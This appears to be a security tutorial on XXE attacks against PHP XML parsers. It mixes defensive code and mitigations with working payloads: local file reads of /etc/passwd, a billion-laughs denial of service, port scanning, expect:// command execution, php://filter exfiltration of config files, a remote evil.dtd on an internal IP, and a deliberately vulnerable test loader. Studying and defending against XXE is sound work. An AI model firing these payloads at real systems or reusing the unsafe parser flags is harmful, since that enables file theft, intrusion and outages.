PHP entities:
Predefined entities: &lt; &amp; and so on, plus numeric character references such as &#37;.
General entity: <!ENTITY general "Hello">, referenced from element content as <a>&general;</a>. An external general entity cannot be referenced from an attribute value (XML forbids it), only from element content.
Parameter entity: <!ENTITY % param "world">, referenced as %param;; it is only usable inside the DTD and is expanded immediately where it is referenced.
Both general and parameter entities can be internal (the replacement text is given inline in the DTD) or external (SYSTEM "uri"), and an external one can point at a local file or a remote resource.
Harm:
(1) Local file read (entity names are case-sensitive, so the declared name and the reference must match exactly)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdsec [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodname>&xxe;</methodname>
(2) Denial of service: point an entity at /dev/zero, or use nested entity expansion ("billion laughs"), where each level references the previous one ten times:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
(3) Access to resources on the internal network
(4) Port scanning, e.g. SYSTEM "http://192.168.1.3:22": the parser's error message or response time differs between open and closed ports
(5) Reaching resources through other protocols: PHP supports http, Java supports gopher (older versions) and ftp (newer versions)
(6) Command execution: if PHP has the expect extension loaded, an entity can run a system command, e.g. <!ENTITY a SYSTEM "expect://uname">
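To see why the nested document under item (2) is dangerous before any parser touches it, here is an added example (not code from the original post) that estimates the expansion size of the internal entity declarations from the DTD text alone, without expanding anything. The regexes, the lolDocument generator and the 1 MiB budget are assumptions made for illustration, not a DTD parser.

```php
<?php
// Added example, not from the original post: estimate how large the nested entity
// declarations in an internal DTD subset would expand to, without expanding them.
// It handles internal general entities with double-quoted values only; the regexes
// are a deliberate simplification, not a DTD parser.

function entityDeclarations(string $xml): array
{
    preg_match_all('/<!ENTITY\s+([A-Za-z_][\w.\-]*)\s+"([^"]*)"\s*>/', $xml, $m, PREG_SET_ORDER);
    $decls = [];
    foreach ($m as $match) {
        $decls[$match[1]] = $match[2];
    }
    return $decls;
}

// Expanded byte length of one entity. $stack detects reference loops; $memo keeps the
// walk linear even though the expansion itself is exponential.
function expandedLength(string $name, array $decls, array &$memo, array $stack = []): int
{
    if (isset($memo[$name])) {
        return $memo[$name];
    }
    if (!isset($decls[$name])) {
        throw new RuntimeException("undeclared entity: $name");
    }
    if (isset($stack[$name])) {
        throw new RuntimeException("entity reference loop through $name");
    }
    $stack[$name] = true;
    $value = $decls[$name];
    $total = 0;
    $offset = 0;
    while (preg_match('/&([A-Za-z_][\w.\-]*);/', $value, $ref, PREG_OFFSET_CAPTURE, $offset)) {
        $total += $ref[0][1] - $offset;                     // literal text before the reference
        $total += expandedLength($ref[1][0], $decls, $memo, $stack);
        $offset = $ref[0][1] + strlen($ref[0][0]);
    }
    $total += strlen($value) - $offset;                     // literal text after the last reference
    return $memo[$name] = $total;
}

// Total expansion of the entity references in the document body (after the internal subset).
function estimateExpansion(string $xml): int
{
    $decls = entityDeclarations($xml);
    $end = strrpos($xml, ']>');
    $body = $end === false ? $xml : substr($xml, $end + 2);
    $memo = [];
    $total = 0;
    preg_match_all('/&([A-Za-z_][\w.\-]*);/', $body, $refs);
    foreach ($refs[1] as $name) {
        $total += expandedLength($name, $decls, $memo);
    }
    return $total;
}

// Constructed input: the nine-level "lol" document from item (2) above, generated in a loop.
function lolDocument(int $levels = 9): string
{
    $dtd = "<!ENTITY lol \"lol\">\n";
    for ($i = 2; $i <= $levels; $i++) {
        $prev = $i === 2 ? 'lol' : 'lol' . ($i - 1);
        $dtd .= "<!ENTITY lol$i \"" . str_repeat("&$prev;", 10) . "\">\n";
    }
    return "<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n$dtd]>\n<lolz>&lol$levels;</lolz>";
}

$xml = lolDocument();
$bytes = estimateExpansion($xml);
// A document of well under 1 KiB expands to 3 * 10^8 bytes: 10^8 leaf references, each "lol".
printf("payload %d bytes, expansion %d bytes, factor %d\n", strlen($xml), $bytes, intdiv($bytes, strlen($xml)));

// Pre-parse guard: refuse input whose estimated expansion exceeds a budget (1 MiB is an
// assumed value), or simply refuse any DOCTYPE when the application never needs one.
const EXPANSION_BUDGET = 1 << 20;
if ($bytes > EXPANSION_BUDGET) {
    echo "rejected: estimated entity expansion exceeds the budget\n";
}
```

The estimate is a cheap front-line check, not the main control: libxml2 has had its own entity amplification limits for years, and LIBXML_PARSEHUGE raises or removes them, so that flag must never be passed for untrusted input.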
General approach:
1. Normal output: the resolved entity is echoed back in the response.
2. Error-based: XML parse errors and DTD/schema validation errors can carry the content.
3. Files of interest on web systems: web.xml, tomcat-users.xml, jetty.xml, httpd.conf.
   Retrieval: php://filter/convert.base64-encode/resource=web.xml
   allow_url_fopen = On is required for the http:// and ftp:// wrappers; the php:// wrapper itself is not gated by that setting.
4. Blind techniques, such as brute-forcing values through XSD validation errors.
How parameter entities are resolved:
Loading an external parameter entity, e.g.:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [<!ENTITY % internal SYSTEM "local_file.xml">
%internal;]>
local_file.xml:
<!ENTITY title "Hello, world!">
After parsing, %internal; has been replaced by <!ENTITY title "Hello, world!">; the declarations in the external file are spliced into the DTD, and the document can then reference &title;.
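The resolution just described, run against a real external DTD file, as an added example that is not the post's code. It assumes ext/dom on PHP 7.4 or later on a Unix host; the temp-file DTD, the parseWithFlags helper and the second, flag-less call are constructed here to contrast what the parser options do. The flags used in the first call are the ones that make a parser vulnerable to XXE, so run it only on a throwaway machine.

```php
<?php
// Added example, not the post's code: the parameter-entity resolution described above,
// run against a real external DTD file. Assumes a Unix temp dir, ext/dom and PHP >= 7.4.
// The parser flags in the first call are the ones that make a parser vulnerable to XXE.

libxml_use_internal_errors(true);
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(false);   // pre-8.0: be explicit that the loader is on
}

// Constructed external DTD, the file that %internal; pulls in.
$dtdPath = tempnam(sys_get_temp_dir(), 'dtd');
file_put_contents($dtdPath, "<!ENTITY title \"Hello, world!\">\n");

// The document from the text, with an absolute file:// URI so resolution does not depend on the cwd.
$xml = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [<!ENTITY % internal SYSTEM "file://$dtdPath">
%internal;]>
<html><t>&title;</t></html>
XML;

function parseWithFlags(string $xml, int $flags): array
{
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, $flags);
    $errors = array_map(fn($e) => trim($e->message), libxml_get_errors());
    libxml_clear_errors();
    $t = $ok ? $dom->getElementsByTagName('t')->item(0) : null;
    return [
        'loaded'     => $ok,
        'text'       => $t ? $t->textContent : null,     // what the application would see
        'serialized' => $t ? $dom->saveXML($t) : null,   // whether &title; was substituted in the tree
        'errors'     => $errors,
    ];
}

// LIBXML_NOENT makes libxml fetch the external parameter entity and substitute &title;,
// so text is "Hello, world!" and the element serializes with the text inline.
print_r(parseWithFlags($xml, LIBXML_NOENT | LIBXML_DTDLOAD));

// With no such flag (libxml2 >= 2.9) the external DTD is never fetched, so title is never
// declared: the reference stays unresolved and the collected errors report the undefined entity.
print_r(parseWithFlags($xml, 0));

unlink($dtdPath);
```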
Out-of-band attack:
test.php
<?php
libxml_use_internal_errors(true);
// Keep the external entity loader enabled so the SYSTEM entity is actually resolved
// (calling libxml_disable_entity_loader() with no argument passes true and disables it).
libxml_disable_entity_loader(false);
$xml1 = <<<EOF
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE any [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>
EOF;
$dom1 = new DOMDocument();
$dom1->loadXML($xml1);
print_r($dom1);
$fields = $dom1->getElementsByTagName('x');
foreach ($fields as $field) {
    print_r($field->nodeName);
    print_r($field->textContent);
}
print_r($dom1->saveXML());
$xx = simplexml_load_string($xml1);
print_r($xx);
print_r(libxml_get_errors());
libxml_clear_errors();
print_r("enderror");
?>
With allow_url_fopen = 0, SYSTEM "http://127.0.0.1:22" is refused in an entity; the same applies to ftp.
An external general entity can only be referenced from element content, e.g. <a>&xxe;</a>, not from an attribute value.
During the experiment I found that print_r($dom->saveXML()) did not output the parsed content; tracing with strace showed that /etc/passwd was accessed, but nothing was output apart from the content before the unresolved &xxe;. The file had been read, so why is it not output? Possibly that output function simply does not work for this; when the content is accessed another way, it is output normally.
php -i prints the build information, including the supported modules; look for the libxml version, e.g. under dom:
dom
DOM/XML => enabled
DOM/XML API Version => 20031129
libxml Version => 2.7.8
HTML Support => enabled
XPath Support => enabled
XPointer Support => enabled
Schema Support => enabled
RelaxNG Support => enabled
libxml
libXML support => active
libXML Compiled Version => 2.7.8
libXML Loaded Version => 20708
libXML streams => enabled
SimpleXML
Simplexml support => enabled
Revision => $Revision: 314376 $
Schema support => enabled
xml
XML Support => active
XML Namespace Support => active
libxml2 Version => 2.7.8
Formats built on XML are affected as well: SVG, and Office documents such as docx and xlsx.
Affected functions: DOMDocument::loadXML(), DOMDocument::load(), simplexml_load_file() (and simplexml_load_string()), and XMLReader.
Retrieval tip: read the file through php://filter with base64 encoding, so that characters such as < or & in the file cannot break the XML:
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini">
]>
<results><result>&harmless;</result></results>
How to bring in an external entity:
(1) Through an external DTD: test.php and evil.dtd, with the result (the original shows all three only as screenshots, which are not reproduced here).
(2) Into an attribute value (only PHP can do this)
test1.php
$xml1 = <<<EOF
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://10.65.60.111/evil.dtd2">
%remote;
%param1;
]>
<root attrib="&internal;"/>
EOF;
evil.dtd2:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">
Unsuccessful; it generally reports an internal error.
Solutions:
1. Upgrade libxml2 to 2.9 or later: from 2.9 on, libxml2 does not fetch external entities unless the caller asks for it with options such as LIBXML_NOENT or LIBXML_DTDLOAD.
2. Call libxml_disable_entity_loader(true) before parsing to disable external entity loading (deprecated as of PHP 8.0, where it is no longer needed as long as those options are not used).
3. When parsing with XMLReader or DOM, pass LIBXML_NONET so the parser cannot reach the network, and do not pass LIBXML_NOENT, LIBXML_DTDLOAD or LIBXML_DTDVALID on untrusted input:
$doc = XMLReader::xml($badXml, 'UTF-8', LIBXML_NONET);
With the DOM functions:
$dom = new DOMDocument(); $dom->loadXML($badXml, LIBXML_NONET);
Note that $dom->loadXML($badXml, LIBXML_DTDLOAD | LIBXML_DTDATTR) is not a hardening: LIBXML_DTDLOAD tells libxml to load the external DTD subset and external parameter entities, which is exactly what the attacker needs.
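The three points above in one script, as an added example that is not the post's own code: the file-read payload from the text parsed by a deliberately vulnerable DOMDocument loader and by a hardened one. The temp-file secret, the function names and the rule of rejecting any DOCTYPE are assumptions of this example; it assumes ext/dom on a Unix host.

```php
<?php
// Added example, not from the original post: one untrusted document parsed by a
// deliberately vulnerable DOMDocument loader and by a hardened one. Assumes ext/dom on a
// Unix host; the "secret" file is constructed here so nothing reads /etc/passwd.

libxml_use_internal_errors(true);

$secretPath = tempnam(sys_get_temp_dir(), 'sec');
file_put_contents($secretPath, "db_password=hunter2\n");     // constructed sample secret

// Attacker-controlled input in the shape of the file-read payload from the text.
$untrusted = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE any [<!ENTITY xxe SYSTEM "file://$secretPath">]>
<x>&xxe;</x>
XML;

function firstXText(DOMDocument $dom): ?string
{
    $x = $dom->getElementsByTagName('x')->item(0);
    return $x ? $x->textContent : null;
}

// Vulnerable: LIBXML_NOENT asks libxml to substitute entities, and that is what makes it
// fetch the external one, on PHP 8 with libxml2 2.9+ included.
function parseVulnerable(string $xml): ?string
{
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD)) {
        return null;
    }
    return firstXText($dom);
}

// Hardened: refuse any DOCTYPE up front (this API never needs one), never pass
// LIBXML_NOENT / LIBXML_DTDLOAD / LIBXML_DTDVALID, add LIBXML_NONET so the parser cannot
// reach the network, and on PHP < 8 also switch the entity loader off.
function parseHardened(string $xml): ?string
{
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new InvalidArgumentException('DOCTYPE is not accepted by this API');
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        return null;
    }
    return firstXText($dom);
}

echo "vulnerable: ", var_export(parseVulnerable($untrusted), true), "\n";   // leaks the secret

try {
    parseHardened($untrusted);
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (", $e->getMessage(), ")\n";
}

echo "hardened on benign input: ", var_export(parseHardened('<x>hello</x>'), true), "\n";

libxml_clear_errors();
unlink($secretPath);
```

The string check for <!DOCTYPE is a cheap first line and assumes the input has already been decoded to UTF-8; the parser options are the actual control. An XMLReader-based loader gets the same treatment: LIBXML_NONET in XMLReader::xml(), and the XMLReader::SUBST_ENTITIES and XMLReader::LOADDTD parser properties left at their default of false.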
PHP XXE attack